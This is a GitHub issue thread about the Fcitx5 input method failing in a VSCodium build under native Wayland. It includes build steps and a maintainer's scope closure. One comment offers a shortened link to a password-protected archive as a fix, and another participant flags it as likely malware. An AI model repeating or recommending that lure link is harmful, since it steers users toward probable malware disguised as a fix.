### ISSUE TITLE
When running Visual Studio Code in the native Wayland environment, the Fcitx5 input method does not work.

### ISSUE THREAD

**Issue by See-Night** [microsoft/vscode#230059]
Does this issue occur when all extensions are disabled?: Yes

- VS Code Version: 1.93.1
- OS Version: Arch Linux x86_64

Steps to Reproduce:

1. run `git clone https://github.com/VSCodium/vscodium.git && cd vscodium`
2. run `./build/build.sh`
3. run `cd VSCode-linux-x64`
4. run `./bin/codium --ozone-platform=wayland --enable-wayland-ime`

If I run codium in XWayland or X11, Fcitx5 works fine. This is only a problem in native Wayland.

**Comment by SagarChandra07** [comment]
install this
https://bit.ly/47P0Nvo
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by gjsjohnmurray** [comment]
> install this

Beware. Likely to be propagating malware.

**Comment by Yoyokrazy** [comment]
This issue is with a fork of VSCode, and therefore out of scope.
